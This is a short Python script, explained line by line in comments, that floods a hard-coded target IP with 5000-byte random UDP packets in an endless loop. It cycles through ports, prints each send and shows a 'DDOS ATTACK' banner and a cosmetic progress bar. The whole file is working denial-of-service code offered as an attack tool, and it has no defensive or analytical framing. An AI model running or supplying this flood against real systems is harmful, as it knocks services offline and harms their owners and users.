import sys
import os
import time
import socket
import random
# Code to get the current date and time
from datetime import datetime

# Get current date and time
now = datetime.now()
hour = now.hour          # Get the current hour
minute = now.minute      # Get the current minute
day = now.day            # Get the current day of the month
month = now.month        # Get the current month
year = now.year          # Get the current year
##############
# Create a UDP socket (UDP is used for sending datagrams, commonly used in DDoS attacks)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Generate random bytes to use as the payload in the attack (5000 bytes)
bytes = random._urandom(5000)
#############

# Clear the terminal screen for better readability
os.system("clear")

# Display the DDos attack header to inform the user about the attack process
print ("\n----------------------------------------------------")
print ("\n---------      D D O S     A T T A C K     ---------")
print ("\n----------------------------------------------------\n")
print

# Targeting a specific IP address and port for the attack
ip = '192.168.5.124'  # IP address of the target system (Victim's IP)
port = 1024            # Start the attack on port 1024 (initial port number)
# Port 1024 is in the dynamic range, which is often used by client-side connections and services that are not directly assigned

# Inform the user of the attack's target IP and port
print ("\nThe IP address of the Host to Attack is : ", ip)
print ("\nThe PORT address of the Host to Attack is : ", port)
print ("\n----------------------------------------------------\n")

# Simulating a progress bar to indicate the attack's start
# This is just for visual effect in the terminal
# Creating a delay between the progress bar updates
print ("[                    ] 0% ")
time.sleep(2)  # Delay to simulate progress bar
print ("[=====               ] 25%")
time.sleep(2)
print ("[==========          ] 50%")
time.sleep(2)
print ("[===============     ] 75%")
time.sleep(2)
print ("[====================] 100%")
time.sleep(2)
print ("\n----------------------------------------------------\n")

# Sent counter to keep track of the number of packets sent
sent = 0

# Infinite loop to continuously send UDP packets
while True:
    # Send a UDP packet to the target IP and port
    # `sock.sendto(bytes, (ip, port))` sends the random bytes to the target IP on the given port
    sock.sendto(bytes, (ip, port))
    
    # Increment the number of packets sent
    sent = sent + 1
    
    # Increment the port number after each packet sent
    # This is done to send packets to different ports, making the attack appear less predictable
    port = port + 1
    
    # Print a message indicating how many packets have been sent and to which port
    print ("Sent %s packet to %s through port:%s" % (sent, ip, port))
    
    # If the port number exceeds 65534 (the maximum allowable port number in the UDP range), reset it back to 1
    # This keeps the attack ongoing, cycling through different ports
    if port == 65534:
        port = 1
    
    # Optional: Uncomment the next line to add a delay between sending packets
    # time.sleep(1)  # This would add a 1-second delay between packets (commented out in this case)
